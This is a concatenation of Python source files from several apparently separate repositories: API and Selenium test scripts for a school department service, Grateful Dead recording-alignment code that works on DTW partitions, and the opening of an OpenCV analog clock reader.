refs/heads/master
|
/TestJB/test07_DELETE.py
|
import requests
# 定义url
url="http://127.0.0.1:8000/api/departments/Test_0111/"
# 请求
r=requests.delete(url)
# 获取响应状态码
print(r.status_code)
# 以文本形式获取响应数据
print(r.text)
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,478
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test02.py
|
import requests,urllib3
# http=urllib3.PoolManager()
# h=http.request("GET","http://www.baidu.com")
# print(h.status)
# print(h.data)
r=requests.get("http://www.baidu.com")
print(type(r.content))
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,479
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Scripts/test_depart.py
|
import os,sys
import pytest
sys.path.append(os.getcwd())
from Resources.resource_in import ResourceIn
from Base.read_yml import ReadYaml
# 读取数据 格式封装
def get_data(method):
if method=="get":
return ReadYaml("depart_data.yml").read_yaml().get("text_depart_get_all")
elif method=="post":
return ReadYaml( "depart_data.yml" ).read_yaml().get( "text_depart_add" )
elif method=="put":
return ReadYaml( "depart_data.yml" ).read_yaml().get( "text_depart_all" )
elif method=="delete":
return ReadYaml( "depart_data.yml" ).read_yaml().get( "text_depart_add" ).get("data")[0].get("dep_id")
class TestDepart():
def setup_class(self):
# 实例化统一入口类 并得到学院对象
self.res=ResourceIn().get_depart()
print("获取新增ID:",get_data("delete"))
# 新增学院
@pytest.mark.run(order=1)
def test_add_depart(self):
try:
result=self.res.resource_add_depart(get_data("post"))
#获取新增状态码
status=result.get("status")
assert 201 == status,"断言新增响应码出错!"
print("新增返回状态码:",status)
except:
print("出错了")
raise
# 查询学院_指定
@pytest.mark.run(order=2)
def test_get_depart_one(self):
result=self.res.resource_get_depart_one(get_data("delete"))
try:
print("查询指定获取结果", result.get("json").get("dep_id"))
# 断言响应报文
assert get_data("delete") == result.get("json").get("dep_id")
# 断言响应状态码
assert 200 == result.get("status")
print("查询指定成功,新增成功!")
except:
print("查询指定出错,新增失败!")
# 查询学院_所有
@pytest.mark.run(order=3)
def test_get_depart(self):
# 查询学院所有
result=self.res.resource_get_depart_all()
try:
assert get_data("get").get("expect_status") == result.get("status"),"断言响应状态码出错!"
print(result.get("status"))
assert get_data("get").get("expect_text") in result.get("text"),"断言文本出错"
print("查询所有学院成功...")
except:
print("查询所有学院失败...")
raise
# 删除学院
@pytest.mark.run(order=4)
def test_delete_depart(self):
result=self.res.resource_delete_depart(get_data("delete"))
print("删除URL为:",result.status_code)
try:
assert 204 == result.status_code
print("删除新增学院,成功!")
except:
print("删除新增学院!")
print(result.get("url"))
print(result.get("status"))
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,480
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test06_POST.py
|
import json
import unittest
import requests
class Test01(unittest.TestCase):
def test001(self):
# 定义url
url="http://127.0.0.1:8000/api/departments/"
# 定义报文
data={
"data": [
{
"dep_id": "T0111",
"dep_name": "Test学院",
"master_name": "Test-Master",
"slogan": "Here is Slogan"
}
]
}
# 指定请求信息头
headers={'content-type': 'application/json'}
# 请求
r=requests.post(url,data=json.dumps(data), headers=headers)
r.encoding="utf-8"
# 获取响应状态码
print(r.status_code)
# 以文本形式获取响应数据
# text=r.text
# print(text)
j=r.json()
expect_result={"already_exist":{"count":0,"results":[]},"create_success":{"count":1,"results":[{"dep_id":"T0111","dep_name":"Test学院","master_name":"Test-Master","slogan":"Here is Slogan"}]}}
# print(expect_result.get("create_success").get("count"))
# self.assertDictEqual(j,expect_result)
assert j == expect_result
if __name__ == '__main__':
unittest.main()
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,481
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test04.py
|
from time import sleep
import time
import sys
from selenium import webdriver
import unittest
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
class test01(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.driver.get("http://git.lilianinfo.com:4044")
self.driver.find_element_by_class_name("username").send_keys("0")
self.driver.find_element_by_class_name("password").send_keys("88998877")
# 点击登陆按钮
self.driver.find_element_by_xpath(".//*[@id='react-content']/div/div[2]/form/a").click()
# 浏览器最大化
self.driver.maximize_window()
sleep(1)
def tearDown(self):
sleep(2)
self.driver.find_element_by_css_selector(".navbarlsta.personmenu>span").click()
sleep(1)
self.driver.find_element_by_xpath(".//*[@id='personal']/div/div[2]/div[2]/button").click()
sleep(2)
self.driver.quit()
def test001(self):
driver = self.driver
driver.implicitly_wait(30)
# 点击导航栏
driver.find_element_by_css_selector(".icon.iconfont.icon-Expand").click()
# 点击病例预警主菜单
driver.find_element_by_xpath(".//*[@id='lteNav']/li[2]/p/p/span").click()
# 点击病例预警子菜单
driver.find_element_by_xpath(".//*[@id='ltewrap']/div[2]/div/ul/li[1]/a").click()
sleep(2)
driver.find_element_by_xpath(".//*[@id='maincontent']/div/div[2]/div/div[2]/div[1]/div/div[2]/div/div/div[1]/div/div[1]/div/div/div/div/div/div/div[2]/table/tbody/tr[3]/td[3]/div").click()
sleep(1)
driver.find_element_by_xpath(".//*[@id='maincontent']/div/div[2]/div/div[2]/div[1]/div/div[2]/div/div/div[3]/div[1]/div/div/div/div/div/div/div[2]/table/tbody/tr[1]/td[3]/div/div/div/div/div").click()
# try:
# sleep(2)
# # text1 = driver.find_element_by_css_selector(".ant-select-dropdown-menu-item-active.ant-select-dropdown-menu-item-selected.ant-select-dropdown-menu-item").text
# text2 = driver.find_element_by_class_name("ant-select-dropdown-menu-item-active").text
# # text3 = driver.find_element_by_css_selector("").text
# # text4 = driver.find_element_by_css_selector("").text
# # text5 = driver.find_element_by_xpath("/html/body/div[4]/div/div/div/ul/li[5]").text
# # text6 = driver.find_element_by_xpath("/html/body/div[4]/div/div/div/ul/li[6]").text
#
# # print("提示的信息为:", text1)
# print("提示的信息为:", text2)
# # print("提示的信息为:", text3)
# # print("提示的信息为:", text4)
# # print("提示的信息为:", text5)
# # print("提示的信息为:", text6)
# # 断言
#
# # self.assertEqual("疑似", text1)
# self.assertEqual("院内", text2)
# # self.assertEqual("院外", text3)
# # self.assertEqual("排除", text4)
# # self.assertEqual("待查", text5)
# # self.assertEqual("转归", text6)
# except AssertionError:
# print("获取的sys.exc_info()信息为:", sys.exc_info()[1])
# nowtime = time.strftime("%Y_%m_%d %H_%M_%S")
#
# print("时间格式为:", nowtime)
# driver.get_screenshot_as_file("../Image/%s-%s.jpg" % (nowtime, "test_107在院病例预警疑似初始显示"))
# # 抛异常
# raise
try:
text1 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[1]").text
text2 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[2]").text
# text3 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[3]").text
# text4 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[4]").text
# text5 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[5]").text
# text6 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[6]").text
print("提示的信息为:", text1)
print("提示的信息为:", text2)
# print("提示的信息为:", text3)
# print("提示的信息为:", text4)
# print("提示的信息为:", text5)
# print("提示的信息为:", text6)
assert text1 == "疑似"
assert text1 == "院内"
# assert text1 == "院外"
# assert text1 == "排除"
# assert text1 == "待查"
# assert text1 == "转归"
print(text1)
print(text2)
# print(text3)
# print(text4)
# print(text5)
# print(text6)
except Exception as e:
# print("获取的sys.exc_info()信息为:", sys.exc_info()[1])
print("测试失败", format(e))
nowtime = time.strftime("%Y_%m_%d %H_%M_%S")
print("时间格式为:", nowtime)
driver.get_screenshot_as_file("../Image/%s-%s.jpg" % (nowtime, "test_107在院病例预警疑似初始显示"))
if __name__ == '__main__':
unittest.main()
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,482
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Resources/resource_classes.py
|
from Base.base_tools import BaseTools
class ResourceClass(BaseTools):
# 班级查询所有
def resource_get_class_all(self):
pass
# 班级查询 指定
def resource_get_class_one(self):
pass
# 班级查询 list
def resource_get_class_list(self):
pass
# 班级查询 模糊
def resource_get_class_partial(self):
pass
# 班级查询 组合
def resource_get_class_combo(self):
pass
# 班级新增
def resource_add_class(self):
pass
# 班级更新
def resource_update_class(self):
pass
# 班级删除
def resource_delete_class(self):
pass
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,483
|
grateful-dead-live/recordings_alignment
|
refs/heads/master
|
/prepare.py
|
import os, json, re
import networkx as nx
from networkx.drawing.nx_agraph import read_dot
from copy import copy
from collections import Counter
from subprocess import Popen, DEVNULL, PIPE
from pprint import pprint
from internetarchive import get_item
import pickle, sys
#DATE = '90-03-14'
#FOLDER = '/Volumes/gspeed1/thomasw/grateful_dead/2020/GD-DTW/results_15s_linregress/'#90-03-14/' #116030_116746'
FOLDER = '/Volumes/gspeed1/thomasw/grateful_dead/2020/GD-DTW/results/'
#FOLDER = './'
def etreeNumber(e):
for j in e.split('.'):
try: return int(j)
except: pass
# dict to find folders of recordings to get lengths of unmatched files
def getDirsDict():
if os.path.exists('dirdict.json'):
return json.load(open('dirdict.json'))
DIR1 = '/Volumes/gspeed1/thomasw/grateful_dead/lma'
DIR2 = '/Volumes/gspeed1/thomasw/grateful_dead/lma_soundboards/sbd'
folders1 = [os.path.join(DIR1, f) for f in os.listdir(DIR1) if os.path.isdir(os.path.join(DIR1, f))]
folders2 = [os.path.join(DIR2, f) for f in os.listdir(DIR2) if os.path.isdir(os.path.join(DIR2, f))]
dirs = folders1 + folders2
dirDict = {}
for d in dirs:
dirDict[etreeNumber(d.split('/')[-1])] = d
json.dump(dirDict, open('dirdict.json', 'w'))
return dirDict
def loadJson(date):
print('loading json files')
jsons = {}
folder = os.path.join(FOLDER, date)
for d in [f for f in os.listdir(folder) if os.path.isdir(os.path.join(folder, f))]:
print(d)
for f in [i for i in os.listdir(os.path.join(folder, d)) if i.endswith('.json') and not i.endswith('full.json') and not i.startswith('unmatched')]:
k = '{0}_{2}__{1}_{3}'.format(*d.split('_')+f[:-5].split('__') )
#jsons[d+'__'+f[:-5]] = json.load(open(os.path.join(folder, d, f)))
jsons[k] = json.load(open(os.path.join(folder, d, f)))
try:
jsons['unmatched'] = json.load(open(os.path.join(folder, 'unmatched.json')))['unmatched']
except:
#print('no unmatched files found')
jsons['unmatched'] = []
return jsons
# find all in_edges including indirectly connected
def find_connected(g, node):
def find_connected_r(g, nodes, connected):
new_connections = []
for n in nodes:
for i in g.in_edges(n[0]):
new_connections.append(i)
if new_connections:
connected += list(new_connections)
return find_connected_r(g, new_connections, connected)
else:
return connected
def chain_connected(cn):
c = 0
to_del = []
result = copy(cn)
for i, n in enumerate(cn):
for j, m in enumerate(cn):
if n[-1] == m[0]:
c += 1
result[i] = tuple(list(n) + list(m)[1:])
if c == 0:
return result
else:
return chain_connected(result)
cn = list(g.in_edges(node))
cn = find_connected_r(g, cn, cn)
cn = chain_connected(cn)
cn = [list(n[:-1]) for n in cn]
return cn
# get connected graphs of individual tracks
def sub_graphs(g):
in_nodes = [n for n in g.nodes() if len(g.in_edges(n)) > 0 and len(g.out_edges(n)) == 0]
return [{n: find_connected(g,n)} for n in in_nodes]
def get_all_ids(g):
res = []
for n in g.nodes():
if n.split('_')[0] not in res:
res.append(n.split('_')[0])
return res
# sort recording by number of matched files
def rank_ids_amount(s):
ids = [list(i.keys())[0].split('_')[0] for i in s]
ids_sorted = [i[0] for i in Counter(ids).most_common()]
return ids_sorted
# sort recording by length
def rank_ids_length(lengths):
l = []
for k, v in lengths.items():
l.append((sum([i[1] for i in v]), k))
#print('lengths', sorted(l, reverse=True))
return [i[1] for i in sorted(l, reverse=True)]
def get_lengths(jsons, id, dirsdict):
lengths = []
for k in jsons.keys():
key_ids = [i.split('_')[0] for i in k.split('__')]
if id in key_ids:
filename = jsons[k]['filenames'][key_ids.index(id)].split('/')[-1]
length = jsons[k]['lengths'][key_ids.index(id)]
if (filename, length) not in lengths:
#print(id, filename)
lengths.append((filename, length))
unmatched = [f for f in jsons['unmatched'] if f.startswith(id)]
if unmatched:
#print('unmatched:', unmatched)
for f in unmatched:
fs = f.split('_')
pa = os.path.join(dirsdict[fs[0]], fs[1])
if f.lower().endswith('shn'):
cmd = 'shntool len ' + pa
p = Popen(cmd, shell=True,stdout=PIPE).communicate()
s = str(p).split()[10].replace('.',':').split(':')
l = int(s[0])*60 + int(s[1]) + int(s[2])*0.01
else:
cmd = 'soxi -D ' + pa
p = Popen(cmd, shell=True,stdout=PIPE).communicate()
l = float(str(p[0])[2:-3])
lengths.append((fs[1], l))
#print(pa,l)
#l = float(next(item for item in get_item(pa.split('/')[-2]).item_metadata['files'] if item["name"] == pa.split('/')[-1])['length'])
#lengths.append((fs[1], l))
#print(pa,l)
#print(lengths)
return sorted(lengths)
def prepare_data(date):
#print('analysing graph')
g = read_dot(os.path.join(FOLDER+date, date+'.dot'))
#g = read_dot(date+'.dot')
#pickle.dump(g, open('g.pickle', 'wb'))
#g = pickle.load(open('g.pickle', 'rb'))
subs = sub_graphs(g)
ids_by_number_of_matched_files = rank_ids_amount(subs)
dirsdict = getDirsDict()
jsons = loadJson(date)
#jsons = pickle.load(open('jsons.pickle', 'rb'))
#pickle.dump(jsons, open('jsons.pickle', 'wb'))
#json.dump(jsons, open('jsons.json', 'w'))
#jsons = json.load(open('jsons.json'))
lengths = {}
for i in get_all_ids(g):
lengths[i] = get_lengths(jsons, i, dirsdict)
#json.dump(lengths, open('lengths.json', 'w'))
#lengths = json.load(open('lengths.json'))
ids_by_length = rank_ids_length(lengths)
# add unmatched to subgraph:
for n in nx.isolates(g):
subs.append({n:[]})
return subs, ids_by_length, ids_by_number_of_matched_files, lengths, jsons
def main():
pass
#subgraphs, ids_by_length, lengths, jsons = prepare_data(DATE)
if __name__ == "__main__":
main()
|
{"/align1.py": ["/prepare.py"]}
|
34,484
|
grateful-dead-live/recordings_alignment
|
refs/heads/master
|
/align1.py
|
from prepare import prepare_data
import json, sys, os
from collections import Counter
from pprint import pprint
from scipy import stats
import numpy as np
from copy import copy
from pprint import pprint
from scipy import stats
import matplotlib.pyplot as plt
from meta_alignment_test import plot_timelines
#DATE = sys.argv[1]
#DATE = '90-03-14'
#DATE = '90-03-24'
DATE = '90-03-15'
MIN_R = 0.9999
flatten = lambda l: [item for sublist in l for item in sublist]
def sort_subgraphs(subs, lengths, ids_by_length):
flatsub = lambda l: list(set([list(l.keys())[0]] + [x for sublist in list(l.values())[0] for x in sublist]))
# file_lists sorted by list length
file_list = []
for i in ids_by_length:
file_list.append([i+'_'+t[0] for t in lengths[i]])
sorted_subs_all = []
for i, rec in enumerate(file_list):
sorted_subs = []
for track in rec:
for j, s in enumerate(subs):
sflat = flatsub(s)
if track in sflat:
sorted_subs.append(j)
break
sorted_subs_all.append(list(dict.fromkeys(sorted_subs)))
sorted_subs_all = sorted(sorted_subs_all, key=len, reverse=True)
ordered = sorted_subs_all[0]
for rec in sorted_subs_all[1:]:
for i, n in enumerate(rec):
if n not in ordered:
prevs = [m for m in rec[:i]]
prevs.reverse()
nexts = [m for m in rec[i+1:]]
pos = None
for p in range(max([len(prevs), len(nexts)])):
if p < len(prevs)-1:
try:
pos = ordered.index(prevs[p]) + 1
break
except:
pass
if p < len(nexts)-1:
try:
pos = ordered.index(nexts[p])
break
except:
pass
if pos != None:
ordered.insert(pos, n)
else:
pass
print('cannot reorder item', rec, n)
print(ordered)
res = [subs[i] for i in ordered]
return res
def track_tuple_to_json_id(n):
return '__'.join(n)
def find_dupes(subs):
dupes = []
for s in subs:
if len(list(s.values())[0]) > 0:
dupes = [ x[0] for x in list(s.values())[0] ]
newDict = dict(filter(lambda e: e[1] > 1, dict(Counter(dupes)).items()))
if newDict:
return newDict
#splits into continuous line segments
def split_segments2(points, delta=0.5):
split = lambda l, locs: [l[i:j] for i, j in zip([0]+locs, locs+[None])]
points = sorted(points)
leap = lambda p, q: abs(p[0] - q[0]) > delta or abs(p[1] - q[1]) > delta
locs = [i for i, p in enumerate(points) if i > 0 and leap(p, points[i-1])]
return split(points, locs)
def find_best_break(segs):
if stats.linregress(flatten(segs))[2] < MIN_R:
rs = []
for i in range(len(segs)):
splits = [flatten(segs[:i]), flatten(segs[i:])]
rs.append(max([stats.linregress(s)[2] for s in splits if len(s) > 0]))
best_break = np.argmax(rs)
if 0 < best_break and best_break < len(segs):
return best_break
def partition(segs):
partitions = [segs]
breaks = [find_best_break(p) for p in partitions]
while len([b for b in breaks if b is not None]) > 0:
partitions = [[p[:breaks[i]], p[breaks[i]:]] if breaks[i] is not None else [p] for i, p in enumerate(partitions)]
partitions = flatten(partitions)
breaks = [find_best_break(p) for p in partitions]
#print([len(p) for p in partitions])
return partitions
#split into reasonably well aligned partitions
def get_partition_bounds(points, jkey):
parts = partition(split_segments2(points))[0]
#print(jkey, 'split into', len(parts))
part_bounds = [[p[0], p[-1]] for p in parts]
return part_bounds
def file_length(f, lengths):
id = f.split('_')[0]
fname = f.split('_')[1] # TODO: fix: this doesn't work when underscores in filename
return list(filter(lambda e: e[0] == fname, lengths[id]))[0][1]
def adjust_length(length, cents):
return length / (2**(cents / 1200))
def plotFigure(segs, json_key, lengths, fname, dtw, jsons):
p = plt.figure()
for s in segs:
#print(s[0], s[1])
try:
colour = s[2]
plt.plot([s[0][0], s[1][0]], [s[0][1], s[1][1]], color=colour, alpha=0.5)
except:
end = dtw.index(s[1]) + 1
start = dtw.index(s[0])
#sdtw = np.array(dtw)[start:end]
#plt.plot(sdtw[:,0], sdtw[:,1], color='b', alpha=0.5) # plot all values from dtw between start and end
plt.plot([s[0][0], s[1][0]], [s[0][1], s[1][1]], color='b', alpha=0.5) # plot line from start to end
#x = sdtw[:,0]
#y = sdtw[:,1]
#coef = np.polyfit(x,y,1)
#poly1d_fn = np.poly1d(coef)
#plt.plot(x, poly1d_fn(x), color='b', alpha=0.5) # plot linear regression line of dtw segment
#ratio = 1 / 2**(jsons[json_key]['tuning_diff'] / 1200)
#len1 = s[1][0] - s[0][0]
#print(len1)
#print(ratio)
#plt.plot([s[0][0], s[1][0]], [s[0][1], s[0][1] + len1 * ratio], color='b', alpha=0.5)
#sys.exit()
'''
# use all points of dtw?
if colour == 'r':
pass
#plt.plot([s[0][0], s[1][0]], [s[0][1], s[1][1]], color=colour, alpha=0.5)
else:
points = dtw[dtw.index([s[0][0], s[1][0]]):dtw.index([s[0][1], s[1][1]])]
print(points)
'''
#break
plt.tight_layout()
p.savefig(fname+'.pdf', bbox_inches='tight')
plt.close(p)
def fill_gaps(json_key, segs, lengths, tuning_diff):
#tuning_diff = jsons[json_key]['tuning_diff']
#print(segs)
new_segs = copy(segs)
for n, s in enumerate(segs):
if n == 0:
start = 0
else:
start = segs[n-1][1][0]
end = s[0][0]
pre_seg = [[[start, s[0][1]-adjust_length(end-start, tuning_diff)], [s[0][0], s[0][1]], 'r']]
new_segs = pre_seg + new_segs
#print(n, pre_seg)
if n == len(segs)-1:
fname_0 = json_key.split('__')[0]
l_0 = file_length(fname_0, lengths)
#print(l_0)
app_seg = [[[s[1][0], s[1][1]], [l_0, s[1][1]+adjust_length(l_0-s[1][0], tuning_diff)], 'r' ]]
new_segs += app_seg
#print(n, app_seg)
return sorted(new_segs, key=lambda s: s[0][0])
'''
def linReg(partitions):
print(partitions)
p = [[i for i in j] for j in partitions[0]]
init_slope, intercept, init_r_value, p_value, std_err = stats.linregress(np.swapaxes(p[0],0,1))
print('first', init_slope, init_r_value**2)
for n, i in enumerate(p[:-1]):
q = np.swapaxes(np.vstack(p[n:n+2]),0,1)
slope, intercept, r_value, p_value, std_err = stats.linregress(q)
#print(q)
print(n, slope, r_value**2)
#test: 2nd segment with 10s jump:
q[1][2:] += 10
slope, intercept, r_value, p_value, std_err = stats.linregress(q)
#print(q)
print('test', slope, r_value**2)
'''
'''
def process_chain_BAK(c, all_partitions, partition_jkeys):
#pprint(partition_jkeys)
#return
translation = []
# try for length 2 only:
for i, t in enumerate(c[1][:-1]):
jk = track_tuple_to_json_id((t, c[1][i+1]))
translation.append(all_partitions[partition_jkeys.index(jk)])
json.dump(translation, open('translation.json', 'w'))
first_seg = translation[0][2][:2]
print()
print('original: ', first_seg)
inter = translation[1]
match_start_seg = list(filter(lambda x: x[0][0] <= first_seg[0][1] <= x[1][0], inter))[0]#[:2]
match_end_seg = list(filter(lambda x: x[0][0] <= first_seg[1][1] <= x[1][0], inter))[0]#[:2]
start_chain = [match_start_seg]
end_chain = [match_end_seg]
def map_seg(p, s):
prop = (p - s[0][0]) / (s[1][0] - s[0][0])
return prop * (s[1][1] - s[0][1]) + s[0][1]
def map_chain(seg, chain):
for s in chain:
seg = [seg[0], map_seg(seg[1], s)]
return seg
start_to_ref = map_chain(first_seg[0], start_chain)
end_to_ref = map_chain(first_seg[1], end_chain)
print('start seg: ', match_start_seg)
print('end seg: ', match_end_seg)
print('new seg: ', start_to_ref, end_to_ref)
'''
# TODO: test for chains > 2
def process_chain(c, all_partitions, partition_jkeys, jsons, lengths):
def map_seg(p, s):
prop = (p - s[0][0]) / (s[1][0] - s[0][0])
return prop * (s[1][1] - s[0][1]) + s[0][1]
print()
print()
print(c)
#c = [c[0]] + c[-2:]
jk1 = track_tuple_to_json_id((c[0], c[1]))
jk2 = track_tuple_to_json_id((c[1], c[-1]))
translation = [all_partitions[partition_jkeys.index(jk1)], all_partitions[partition_jkeys.index(jk2)]]
new_segments = []
for s in translation[0]:
prepend = False
append = False
seg = s[:2]
print('original: ', seg)
# if start[0][1] < 0 or start[1][1] > length the first/last segment is extended. tuning_diff instead?
search_segment = list(filter(lambda x: x[0][0] <= seg[0][1] <= x[1][0], translation[1]))
if search_segment:
match_start_seg = search_segment[0][:2]
else:
print('prepend to ', translation[1][0][:2])
match_start_seg = translation[1][0][:2]
prepend = True
search_segment = list(filter(lambda x: x[0][0] <= seg[1][1] <= x[1][0], translation[1]))
if search_segment:
match_end_seg = search_segment[-1][:2]
else:
print('append to ', translation[1][-1][:2])
match_end_seg = translation[1][-1][:2]
append = True
if prepend:
stype = 'cp'
elif append:
stype = 'ca'
else:
stype = 'c'
start_to_ref = [seg[0][0], map_seg(seg[0][1], match_start_seg)]
end_to_ref = [seg[1][0], map_seg(seg[1][1], match_end_seg)]
new_segment = [start_to_ref, end_to_ref, stype]
new_segments.append(new_segment)
print('new seg: ', new_segment)
print()
#sys.exit()
new_jkey = track_tuple_to_json_id((c[0], c[-1]))
print(new_jkey)
json.dump(new_segments, open('new_segments.json', 'w'))
all_partitions.append(new_segments)
partition_jkeys.append(new_jkey)
p = plt.figure()
for s in new_segments:
plt.plot([s[0][0], s[1][0]], [s[0][1], s[1][1]], color='b', alpha=0.5)
plt.tight_layout()
p.savefig('chain_test/'+new_jkey+'.pdf', bbox_inches='tight')
plt.close(p)
return all_partitions, partition_jkeys
# remove intermediate chain alignments from result
def cleanResult(subgraphs, all_partitions, partition_jkeys):
for sub in subgraphs:
for s in list(filter(lambda e: len(e)>1, list(sub.values())[0])):
jk = track_tuple_to_json_id((s[0], s[1]))
ji = partition_jkeys.index(jk)
print(ji, jk)
del partition_jkeys[ji]
del all_partitions[ji]
return all_partitions, partition_jkeys
def main():
subgraphs, ids_by_length, ids_by_number_of_matched_files, lengths, jsons = prepare_data(DATE)
subgraphs = sort_subgraphs(subgraphs, lengths, ids_by_length)
#file_length('116746_gd1990-03-14s1t02.flac', lengths)
#json.dump(jsons, open('jsons.json', 'w'))
#json.dump(lengths, open('lengths.json', 'w'))
#json.dump(subgraphs, open('subgraphs.json', 'w'))
#sys.exit()
all_partitions = []
partition_jkeys = []
for sub in subgraphs:
chains = [] # json keys of chained alignments
sub_partitions = []
for s in list(sub.values())[0]:
#if len(s) > 1:
if len(s) > 1:
jkey = track_tuple_to_json_id((s[0], s[1]))
chains.append(s + list(sub.keys()))
else:
jkey = track_tuple_to_json_id((s[0], list(sub.keys())[0]))
dtw = jsons[jkey]['dtw']
dtw = [[x[1], x[0]] for x in dtw] #swap columns to match order of file names/lengths
tuning_diff = jsons[jkey]['tuning_diff']
partitions = get_partition_bounds(dtw, jkey)
partitions = fill_gaps(jkey, partitions, lengths, jsons[jkey]['tuning_diff'])
all_partitions.append(partitions)
partition_jkeys.append(jkey)
target_folder = os.path.join('plots', DATE)
if not os.path.exists(target_folder):
os.mkdir(target_folder)
fname = f'{target_folder}/{jkey}'
#print(fname)
#json.dump(sorted(partitions, key=lambda x: x[0][0]), open(fname+'.json', 'w'))
#sys.exit()
#plotFigure(partitions, jkeys[0], lengths, fname, dtw, jsons)
#break
for c in chains:
all_partitions, partition_jkeys = process_chain(c, all_partitions, partition_jkeys, jsons, lengths)
#break
#json.dump(all_partitions, open('all_partition.json', 'w'))
#break
all_partitions, partition_jkeys = cleanResult(subgraphs, all_partitions, partition_jkeys)
result = {}
for key, value in zip(partition_jkeys, all_partitions):
result[key] = value
result['unmatched'] = jsons['unmatched']
json.dump(result, open('all_partition.json', 'w'))
#json.dump(result, open('all_partition.json', 'w'))
#pprint(partition_jkeys)
#timelines =
#plot_timelines(timelines, names, outfile)
'''
#find overlaps in reference
for j, p in enumerate(all_partitions):
for i in range(len(p)):
if i > 0 and p[i-1][1][1] > p[i][0][1]+1: #starts earlier on the y axis
#there's an overlap
print(partition_jkeys[j])
print(p[i-1], p[i])
print()
'''
#all_partitions = linReg(all_partitions)
#with open(jkeys[0] + '.txt', 'w') as sfile:
#.l pprint(all_partitions[0], sfile)
#plotFigure(all_partitions[0], jkeys[0], lengths)
#d = find_dupes(subgraphs)
#pprint('dupes:', d)
main()
'''
{
"116746_gd1990-03-14s1t02.flac": [
["116030_GD90-03-14d1t02.flac"],
["89689_gd1990-03-14d1t01.flac"],
["83778_gd1990-03-14d1t02.flac", "116030_GD90-03-14d1t02.flac"],
["125852_gd1990-03-14.Nak300.t01.flac", "89689_gd1990-03-14d1t01.flac"]
]
}
'''
|
{"/align1.py": ["/prepare.py"]}
|
34,492
|
msheroubi/AnalogClockReader
|
refs/heads/master
|
/MS_ClockReader.py
|
import numpy as np
import cv2
import math
from PIL import ImageGrab
import time
from skimage.transform import (hough_line, hough_line_peaks,
probabilistic_hough_line)
from skimage.feature import canny
from skimage import data
"""
============================================================================================================
READING TIME OFF ANALOG CLOCKS FROM IMAGES/VIDEO
Video frames have to be fed one at a time into the loop at the bottom, where the view of the clock does not change in the video.
'###' signifies deprecated/old code used
============================================================================================================
"""
## prevRoi: used to store previous ROI incase the roi detection fails, during the loop, it uses the previous ROI which should be the clock
prevRoi = [[0,0],[1,0],[1,1],[0,1]]
clockCenter = (0,0)
## glob_* : used to store properties of the clockhands
glob_clockhands = [[], []]
glob_lineCoords = [(), ()];
## DEPRECATED
##As of April 2nd, this wasn't used. This was used to draw lines when using OpenCv's Hough Lines
def draw_lines(img, lines):
try:
for line in lines:
coords = line[0]
return cv2.line(img,(coords[0], coords[1]), (coords[2], coords[3]), [255,255,255], 3)
except:
pass
##Get region of interest given an image and vertices and returns a masked image where anywhere outside the ROI is black
def roi(img, vertices):
mask = np.zeros_like(img)
cv2.fillPoly(mask, vertices, 255)
masked = cv2.bitwise_and(img, mask)
return masked
## DEPRECATED
##As of April 2nd, this wasn't used. This was used to generate automatic threshholds for an image using a sigma value and the median of the image array
def auto_canny(image, sigma=0.33):
#Get median
v = np.median(image)
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edged = cv2.Canny(image, lower, upper)
return edged
## BULK OF IMAGE PROCESSING
